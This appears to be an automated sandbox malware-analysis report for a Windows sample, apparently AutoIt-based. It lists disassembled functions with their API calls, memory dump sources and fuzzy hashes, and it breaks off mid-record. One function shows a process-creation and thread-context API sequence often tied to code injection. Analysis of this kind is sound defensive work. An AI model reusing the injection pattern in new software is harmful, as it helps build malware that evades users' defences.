                                                              Function 00ACD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00ACD28B,SwapMouseButtons,00000004,?), ref: 00ACD2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00ACD28B,SwapMouseButtons,00000004,?,?,?,?,00ACC865), ref: 00ACD2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00ACD28B,SwapMouseButtons,00000004,?,?,?,?,00ACC865), ref: 00ACD2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: fe1d0ee70ff597be2ede5744575651752ac3c0ecdac83694e64b3da96ce2a36a
                                                              • Instruction ID: 9937e0d1645f8e8ad7085a4c35763f2f35c7f7909243a004e468f0e576ab9e8e
                                                              • Opcode Fuzzy Hash: fe1d0ee70ff597be2ede5744575651752ac3c0ecdac83694e64b3da96ce2a36a
                                                              • Instruction Fuzzy Hash: 14113575611218BFDB218FA8DC84EEF7BB8EF44744F11486DE805DB210EB31AE419B60
                                                              Function 00E86490 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E86C4B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E86CE1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E86D03
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                              • Instruction ID: a9c2bd0cd3e11ef2c7c46e1b6a6b348d1889671abb4b9723137185e8fc249fa2
                                                              • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                              • Instruction Fuzzy Hash: CB62FB30A14258DBEB24DFA4C851BDEB372EF58304F1091A9E10DEB390E7769E85CB59
                                                              Function 00AB2322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AB24F1), ref: 00AB2303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AB25A1
                                                              • CoInitialize.OLE32(00000000), ref: 00AB2618
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B2503A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: 0
                                                              • API String ID: 3815369404-3684773922
                                                              • Opcode ID: 3d8ee816cd5e0373e5c21859b08a9f48915150721a67953138181157e932b22d
                                                              • Instruction ID: 016d72ac6ef1dda143d9c980700e4ee074ff0e3dfbe376d6a033d39e51f5e468
                                                              • Opcode Fuzzy Hash: 3d8ee816cd5e0373e5c21859b08a9f48915150721a67953138181157e932b22d
                                                              • Instruction Fuzzy Hash: 6271BEB59112858F8304EF6EA991599BBE8FB983407914AAED11EDB772DF304484CF38
                                                              Function 00AFC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB4517: _fseek.LIBCMT ref: 00AB452F
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC65D
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC670
                                                              • _free.LIBCMT ref: 00AFC4DD
                                                              • _free.LIBCMT ref: 00AFC4E4
                                                              • _free.LIBCMT ref: 00AFC54F
                                                                • Part of subcall function 00AD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00AD7A85), ref: 00AD1CB1
                                                                • Part of subcall function 00AD1C9D: GetLastError.KERNEL32(00000000,?,00AD7A85), ref: 00AD1CC3
                                                              • _free.LIBCMT ref: 00AFC557
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction ID: f115283cbf2088d6bac884954f2636d0c87277d46993c68b6f7e0263f6108eb3
                                                              • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction Fuzzy Hash: B3514EB1904218AFDF149F64DD81AEDBBB9EF48314F1004AEB259A3242DB715A908F59
                                                              Function 00ACEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00ACEBB2
                                                                • Part of subcall function 00AB51AF: _memset.LIBCMT ref: 00AB522F
                                                                • Part of subcall function 00AB51AF: _wcscpy.LIBCMT ref: 00AB5283
                                                                • Part of subcall function 00AB51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00ACEC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ACEC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B23C88
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: 05589c1b5bd4c6b7fd5ae30c2fb42d9a1737505d24c05f8e58851c3e5e405791
                                                              • Instruction ID: b28ef693f44aa4d5098e25937137e7cfc26dee4363c982585e8a341d9b4c1b79
                                                              • Opcode Fuzzy Hash: 05589c1b5bd4c6b7fd5ae30c2fb42d9a1737505d24c05f8e58851c3e5e405791
                                                              • Instruction Fuzzy Hash: D221A7709087949FE732DB28DC59FEBBBECDB05708F04048DE69E67281C7786A848B51
                                                              Function 00AB40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B23725
                                                              • GetOpenFileNameW.COMDLG32 ref: 00B2376F
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                                • Part of subcall function 00AB40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB40C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 5e5ca27ee45f840e434b9c33a6eb56edd6b417905d74988306ef29928784bc74
                                                              • Instruction ID: a517f4cb164f5aa3aeb714a3ce285f61c06d6b8df57c80659b1a3170744f6be6
                                                              • Opcode Fuzzy Hash: 5e5ca27ee45f840e434b9c33a6eb56edd6b417905d74988306ef29928784bc74
                                                              • Instruction Fuzzy Hash: 6421A871A10298AFCF01DF98D845BDE7BFDDF49704F00405AE505A7242DFB85A898F65
                                                              Function 00AFC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00AFC72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AFC746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 2cc649c37d4092a6d447d26dc7ab977cdb0b77f93a645f3d26955f06946e837e
                                                              • Instruction ID: 0735681655a2aa6a4ab174ba761acc4b0355f91b1f1de5ce35b9ae07bd7435ad
                                                              • Opcode Fuzzy Hash: 2cc649c37d4092a6d447d26dc7ab977cdb0b77f93a645f3d26955f06946e837e
                                                              • Instruction Fuzzy Hash: 2AD05E7150030EABDB10ABA0EC0EF8BB7AC9700704F0001A0B651A60F1DAB4E6998B54
                                                              Function 00B0F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 769977e28e62e808da9f4890de6f2fcd2f5c49c37e8304c92c1e176164706833
                                                              • Instruction ID: c33928a83281edfa7c40c66654be2c9271a04e41c8f16d8825a4aa57db7bc4dc
                                                              • Opcode Fuzzy Hash: 769977e28e62e808da9f4890de6f2fcd2f5c49c37e8304c92c1e176164706833
                                                              • Instruction Fuzzy Hash: 47F15A716083069FC720DF24C581B6ABBE5FF88314F14896EF9959B292DB70E945CF82
                                                              Function 00AB4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AB5022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB50CB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: c99a6a09e70c825fba954680848d9fa5705a65376479287e6bfda50c30af1585
                                                              • Instruction ID: 9520c3fc9d260952438240f60e250d124ad56fb76285607643084e5fce64f546
                                                              • Opcode Fuzzy Hash: c99a6a09e70c825fba954680848d9fa5705a65376479287e6bfda50c30af1585
                                                              • Instruction Fuzzy Hash: 5F314FB19047419FD721EF38E8456DBBBE8FB49304F00092EE59E87251E771A944CBA2
                                                              Function 00AD395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD81C2: __NMSG_WRITE.LIBCMT ref: 00AD81E9
                                                                • Part of subcall function 00AD81C2: __NMSG_WRITE.LIBCMT ref: 00AD81F3
                                                              • __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD821F: GetModuleFileNameW.KERNEL32(00000000,00B70312,00000104,00000000,00000001,00000000), ref: 00AD82B1
                                                                • Part of subcall function 00AD821F: ___crtMessageBoxW.LIBCMT ref: 00AD835F
                                                                • Part of subcall function 00AD1145: ___crtCorExitProcess.LIBCMT ref: 00AD114B
                                                                • Part of subcall function 00AD1145: ExitProcess.KERNEL32 ref: 00AD1154
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: 301101d9b0fe8540ba251ddc5425224ee9f7b9684e3d7e3e35204bd4e81b7da3
                                                              • Instruction ID: 8abd34a05052ed3a566c238776103b4cfbd99db0a05e038230e59955217c8418
                                                              • Opcode Fuzzy Hash: 301101d9b0fe8540ba251ddc5425224ee9f7b9684e3d7e3e35204bd4e81b7da3
                                                              • Instruction Fuzzy Hash: 9701F977355201AAEA253B28ED72A3E73589F81760F20012BF507D7381DFF09D408661
                                                              Function 00AFC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AFC385,?,?,?,?,?,00000004), ref: 00AFC6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AFC708
                                                              • CloseHandle.KERNEL32(00000000,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AFC70F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 8ebec463a4e1e8bb09fdacd333e9acf905e28e53ccfad215c4a4d5436d26283d
                                                              • Instruction ID: 8c94c300fd127c91bdb6fd977c4d1a51a6dd68f2e06a8cca7012fcd21381db98
                                                              • Opcode Fuzzy Hash: 8ebec463a4e1e8bb09fdacd333e9acf905e28e53ccfad215c4a4d5436d26283d
                                                              • Instruction Fuzzy Hash: 05E08632140618B7D7212B55BC09FCE7B18AB05770F204110FB157B0E09BB129119798
                                                              Function 00AFBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00AFBB72
                                                                • Part of subcall function 00AD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00AD7A85), ref: 00AD1CB1
                                                                • Part of subcall function 00AD1C9D: GetLastError.KERNEL32(00000000,?,00AD7A85), ref: 00AD1CC3
                                                              • _free.LIBCMT ref: 00AFBB83
                                                              • _free.LIBCMT ref: 00AFBB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction ID: b10fba099853d28c83e1e2a80bb6db96e85f563728d672121fdc03faa84848dd
                                                              • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction Fuzzy Hash: 9EE012A166174556DA2467B9EF44EB323EC4F04352714081EB55AE7246EF24E84085B4
                                                              Function 00B10828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strcat.LIBCMT ref: 00B108FD
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • _wcscpy.LIBCMT ref: 00B1098C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                              • String ID:
                                                              • API String ID: 1012013722-0
                                                              • Opcode ID: 917e7c2a2f81f1693d009fe77211bfc271bff1366931a38b1b1e6a66818bc3e6
                                                              • Instruction ID: 2dbe3a40c522f9b0eae35a2f682a181f6e6f2ef2edf73a6c7902d9e23ecdbf5e
                                                              • Opcode Fuzzy Hash: 917e7c2a2f81f1693d009fe77211bfc271bff1366931a38b1b1e6a66818bc3e6
                                                              • Instruction Fuzzy Hash: 75913C35610605DFCB18EF18C5919A9B7E5FF59310B9580AAE85A8F392DB70EE81CF80
                                                              Function 00AB3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00AB3A73
                                                                • Part of subcall function 00AD1405: __lock.LIBCMT ref: 00AD140B
                                                                • Part of subcall function 00AB3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AB3AF3
                                                                • Part of subcall function 00AB3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB3B08
                                                                • Part of subcall function 00AB3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AB3AA3,?), ref: 00AB3D45
                                                                • Part of subcall function 00AB3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00AB3AA3,?), ref: 00AB3D57
                                                                • Part of subcall function 00AB3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B71148,00B71130,?,?,?,?,00AB3AA3,?), ref: 00AB3DC8
                                                                • Part of subcall function 00AB3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00AB3AA3,?), ref: 00AB3E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB3AB3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: 2e26778d99d0ab2bc7467c94224210e208d8dc0443fd21896b0d3c4b4caffccc
                                                              • Instruction ID: 6ebbb489e5257056fa0abbaee0c9a8e4580594f793722730d53e8058016e781f
                                                              • Opcode Fuzzy Hash: 2e26778d99d0ab2bc7467c94224210e208d8dc0443fd21896b0d3c4b4caffccc
                                                              • Instruction Fuzzy Hash: AB11AC719083409FC300EF29ED05A0EBBF9FB94350F00891EF489832A2DF709984CBA2
                                                              Function 00ADE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 00ADEA29
                                                              • __close_nolock.LIBCMT ref: 00ADEA42
                                                                • Part of subcall function 00AD7BDA: __getptd_noexit.LIBCMT ref: 00AD7BDA
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 0abac1eb251ab8268307162da2affca0dd5bf0b85642aa5c099b32ea940796fc
                                                              • Instruction ID: 6a663b40bf833fb844356d0151e35c675d29184461613e09644a3f25c7243cfe
